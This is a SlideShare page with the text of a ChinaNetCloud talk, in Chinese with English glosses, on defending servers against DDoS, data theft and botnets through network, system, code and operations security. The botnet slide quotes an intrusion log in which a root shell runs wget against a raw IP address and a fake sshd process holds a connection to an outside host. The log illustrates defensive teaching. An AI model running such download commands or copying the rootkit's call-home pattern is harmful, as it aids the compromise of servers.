SlideShare a Scribd company logo
Copyright © 2016 ChinaNetCloud新系统的搭建与管理 ● 现有系统的优化与管理 ● 公有云和私有云的运维管理
管理全球互联网服务器
从不同层面抵抗外部攻击
云络 王 寒
扫描二维码获取更多
2
令人激动的互联网
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
3
融入生活每一部分
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
4
但,不是诸事如意
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
5
当今三大安全问题
DDoS
数据盗窃
Botnets 僵尸网络
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
6
Security Problem #1 – DDoS
第一安全问题-DDoS
• For Fun 捣蛋
• Get Money 赚钱
• Competitors 竞争
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
7
• Steal Money
偷钱
• Steal/Sell Data
偷数据
• Steal Code
偷代码
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
Security Problem #2 – Stealing Data
第二安全问题-数据盗窃
扫描二维码获取更多
8
Security Problem #3 – BotNETs
第三个安全问题-僵尸网络
• Break In 攻入
• Install Root Kit 安装
• Call home for control 呼叫
• Do evil 作恶
Apr 23 14:34:03 [/root]# wget http://61.147.103.146:999/IP
root 1451 0.1 0.0 75196 1260 ? Ssl 00:54 1:36 /root/sshd
sshd 1451 root 4u IPv4 318269 0t0 TCP :22839->36.251.187.212:13800 (ESTABLISHED
云络科技 – 从不同层面抵抗外部攻击
9
四层安全
系统网络
代码 运维
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
10
网络安全
• DDoS 攻击1 Overload Bandwidth 带宽超载
• DDoS 攻击2 Overload Servers 服务器超载
• Cloud Filtering – Anquanbao 安全宝
• CDN, IDC-CDN, IDC硬件支持
DDoS 策略
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
11
系统安全
• Required – Basic protection
要求-基本的保护
• Basic filtering
基本的过滤
• NAT inbound
• ssh, monitoring
• NAT outbound
• Backups, DNS, ntp, updates
WAF 网页应用防火墙
传统防火墙
• Base on HTTP analysis
基于HTTP的请求分析
• Web漏洞攻击,SQL注入,XSS跨站,网页爬虫
• Dedicated Hardware
专有硬件设备
• Palo Alto Networks
• Software / Virtual
软件/虚拟服务
• Anquanbao - 安全宝
• Aliyun Cloud Shell - 云盾
• Filtering & Limiting
过滤和限制
• IP, agent, url, session
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
12
代码安全 —— OWASP项目
http://owasp.org.cn
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
13
代码安全 —— 代码扫描
• Best practice — OWASP
最佳实践
• Find new problems
找到新问题
• As you update
更新
• Third parties
第三方
• New exploits
新的改进
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
14
运维安全 —— 经常被遗忘
• Often forgotten
经常被遗忘
• Often use defaults
经常采取默认设置
• Or random Google search
或用谷歌搜索配置
• Source of great danger
风险的发源地
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
15
运维安全 —— 服务器
• Best practices
最佳实践
• Lots of small issues
许多细小问题
• Running user - 用户运行
• File permissions - 文件许可
• Dangerous uploads - PHP inside JPEGs
危险的上传
• SSL – Heartbleed, etc.
APP 服务器Web 服务器
• Best Practices
最佳实践
• Delete example APPs
删除样例
• Delete tools (Tomcat)
删除工具
• Patch Software (Java!)
软件补丁
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
16
运维安全 —— 服务器
数据库
• Use Best Practices
最佳实践
• Secure Configuration
安全配置
• Limited User Permission
限制用户许可
• Separate User for each App
区分每个APP的用户
• Safe File Permissions
安全的文件许可
• Log SQL if possible
尽可能记录SQL
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
17
运维安全 —— 操作系统
• Hardened OS
加固
• Iptables
防火墙
• Run Users
用户运行
• File permissions
文件许可
• Logging
日志
• Scanning (ClamAV)
扫描
• Track activity
轨迹追踪
• Automate
自动
• System Updates
系统升级
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
18
运维安全 —— 网络
• VPC on Clouds – Separate
使用公共云上隔离的私有网络
• Consider Out-of-Band Link (DDoS)
考虑带外数据链接
• Firewalls – Front & Middle
防火墙-前端&中间
• Secure Configuration
安全配置
• Separate test/dev network
区分测试/开发
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
19
运维安全 —— 云平台
• Best Practice
最佳实践
• Control Access
控制登录权限
• Separate Backups
备份隔离
• Can delete EVERYTHING
会被意外删除
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
20
运维安全 —— 备份安全
• Backups ARE part of Security
备份属于安全管理的范畴
• If all else fails, use backups
若发生意外,使用备份
• Keep them Secure
安全备份
• Avoid Theft & Tampering
防止盗窃或恶意企图
• Read-Only is Best
最好采用只读
运维安全 —— 安全监控
运维安全 —— 审计
Deep Check to Find Problems
深入检查,发现问题
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击
总结
非常重要 越来越难
专家帮助工具繁多
扫描二维码获取更多
21云络科技 – 从不同层面抵抗外部攻击
22
谢 谢!
扫描二维码获取更多
云络科技 – 从不同层面抵抗外部攻击

More Related Content

PDF
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
PPTX
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
PPTX
資訊安全入門
PPTX
OWASP Top 10 (2013) 正體中文版
PDF
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
PPTX
2017.11.22 OWASP Taiwan Week (Lucas Ko)
PDF
6.fet d do_s攻防演練展示
PPTX
A Concept of Network Analysis Tool by Data Mining
运维安全 抵抗黑客攻击_云络安全沙龙4月上海站主题分享
賽門鐵克個人資料保護法解決方案 (專注在 DLP)
資訊安全入門
OWASP Top 10 (2013) 正體中文版
郭憲誌/迎戰駭客攻擊,打造企業資安堡壘
2017.11.22 OWASP Taiwan Week (Lucas Ko)
6.fet d do_s攻防演練展示
A Concept of Network Analysis Tool by Data Mining

What's hot (18)

PPTX
從AlphaGo的設計淺談資安領域的異常分析流程
PDF
Android Taipei 2013 August - Android Apps Security
PPTX
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
PDF
用戶端攻擊與防禦
PDF
共契使用單位簡報 環保局應用
PPTX
資訊安全入門
PDF
Study of android malicious in dynamic unpacking
PDF
使安全成為軟體開發必要部分
PPTX
Ch10 firewall(2013 ncu-nos_nm)
PDF
【HITCON FreeTalk】Supply Chain Attack
PDF
伺服器端攻擊與防禦III
PDF
6.web 安全架构浅谈
PDF
網站系統安全及資料保護設計認知
PPTX
Forensics 101
PPTX
.NET Security Application/Web Development - Overview
PDF
台科大網路鑑識課程 封包分析及中繼站追蹤
PDF
互联网公司web安全挑战与防护思路浅谈
PPTX
Cyberoam人員識別管理新世代防毒牆(正式版)
從AlphaGo的設計淺談資安領域的異常分析流程
Android Taipei 2013 August - Android Apps Security
New immune system of information security from CHINA by WooYun - CODE BLUE 2015
用戶端攻擊與防禦
共契使用單位簡報 環保局應用
資訊安全入門
Study of android malicious in dynamic unpacking
使安全成為軟體開發必要部分
Ch10 firewall(2013 ncu-nos_nm)
【HITCON FreeTalk】Supply Chain Attack
伺服器端攻擊與防禦III
6.web 安全架构浅谈
網站系統安全及資料保護設計認知
Forensics 101
.NET Security Application/Web Development - Overview
台科大網路鑑識課程 封包分析及中繼站追蹤
互联网公司web安全挑战与防护思路浅谈
Cyberoam人員識別管理新世代防毒牆(正式版)
Ad

Similar to ChinaNetCloud Online Lecture: Fight Against External Attacks From Different Levels (20)

PPTX
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
PPTX
Internet System Security Overview
PDF
云计算时代的新安全挑战与机会
PDF
議題三:政府網站常見弱點與分析
PPT
11/14王團研究室—安全大師王團論毒 in台中
PDF
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
PPT
Построение гиперболического параболоида
PDF
Brochure ahn lab trusguard utm
PDF
Network security reesjohnson
PDF
在互联网公司推行SDL(Security Development Lifecycle)的一些经验和教训
PDF
Spirent_securityLab-服務介紹_2022.pdf
PPT
开源软件营销策略
PDF
云安全防护的战略思考
PPT
渗透测试思路技术与方法
PPT
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
PPTX
虎尾科大報告
PDF
盛大游戏运维体系
PDF
盛大游戏运维体系
PDF
企业安全应急响应与渗透反击V0.04(程冲)
PPTX
做好开源软件安全管理 帮您移开IoT认证的挡路石
賽門鐵克端點安全教戰守則 - Symantec Endpoint Protection 及 Symantec Critical System Protec...
Internet System Security Overview
云计算时代的新安全挑战与机会
議題三:政府網站常見弱點與分析
11/14王團研究室—安全大師王團論毒 in台中
Rsa2012 下一代安全的战略思考-绿盟科技赵粮
Построение гиперболического параболоида
Brochure ahn lab trusguard utm
Network security reesjohnson
在互联网公司推行SDL(Security Development Lifecycle)的一些经验和教训
Spirent_securityLab-服務介紹_2022.pdf
开源软件营销策略
云安全防护的战略思考
渗透测试思路技术与方法
11/21王團研究室—火線殺毒完全攻略—菁英課程:2010防毒新趨勢
虎尾科大報告
盛大游戏运维体系
盛大游戏运维体系
企业安全应急响应与渗透反击V0.04(程冲)
做好开源软件安全管理 帮您移开IoT认证的挡路石
Ad

More from ChinaNetCloud (20)

PPTX
AWS ELB Tips & Best Practices
PPTX
OpsStack--Integrated Operation Platform
PPTX
ChinaNetCloud Online Lecture:Something About Tshark
PPTX
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
PPTX
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
PPTX
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
PPTX
AWS Summit OaaS Talk by ChinaNetCloud
PDF
Running Internet Systems in China - The Details You Need to Succeed in Chines...
PDF
Making Internet Operations Easier
PPTX
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
PPTX
Big Data Security (ChinaNetCloud - Guiyang Conference)
PPTX
Why Work at ChinaNetCloud
PPTX
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
PPTX
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
PPTX
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
PDF
Clouds in China
PPTX
ChinaNetCloud - Public Clouds in China Overview
PPT
ChinaNetCloud - China Internet Infrastructure Summary
PPT
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
PPT
Networking Layer Basics - ChinaNetCloud Training
AWS ELB Tips & Best Practices
OpsStack--Integrated Operation Platform
ChinaNetCloud Online Lecture:Something About Tshark
Steve Mushero on Entrepreneurship - 创业 - 崔牛会
Dev-Ops与Docker的最佳实践 QCon2016 北京站演讲
云中漫步 颠覆创新_创业邦春季创新峰会主题演讲 Cloud Innovation in China
AWS Summit OaaS Talk by ChinaNetCloud
Running Internet Systems in China - The Details You Need to Succeed in Chines...
Making Internet Operations Easier
Internet Cloud Operations - ChinaNetcloud & AWS Event Beijing
Big Data Security (ChinaNetCloud - Guiyang Conference)
Why Work at ChinaNetCloud
Cloud Operations Challenges - Talk by ChinaNetCloud at Joint Cisco event
Automatically Managing Internet Operations In The Cloud - 云计算平台的自动化运维
ChinaNetCloud - Aliyun Joint Event on Cloud Operations
Clouds in China
ChinaNetCloud - Public Clouds in China Overview
ChinaNetCloud - China Internet Infrastructure Summary
Linux Memory Basics for SysAdmins - ChinaNetCloud Training
Networking Layer Basics - ChinaNetCloud Training

ChinaNetCloud Online Lecture: Fight Against External Attacks From Different Levels